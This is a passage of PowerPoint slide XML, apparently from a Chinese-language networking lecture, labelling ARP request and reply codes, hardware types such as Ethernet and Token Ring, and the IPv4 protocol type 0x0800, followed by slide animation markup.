                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(request)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>应答（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37905" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476375" y="1341438"/>
            <a:ext cx="1822450" cy="1014412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ethernet (10 Mb)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Amateur Radio AX.25</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Token Ring</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IEEE 802 networks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Local talk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011863" y="1989138"/>
            <a:ext cx="1354137" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x0800</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>IPv4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs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4584"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24584"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2458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4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24583"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24583"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24583"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24583"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24583"/>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7" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24582"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24582"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24582"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24582"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24582"/>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17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24581"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24581"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24581"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24581"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24581"/>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ID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24580"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24580"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24580"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24580"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24580"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
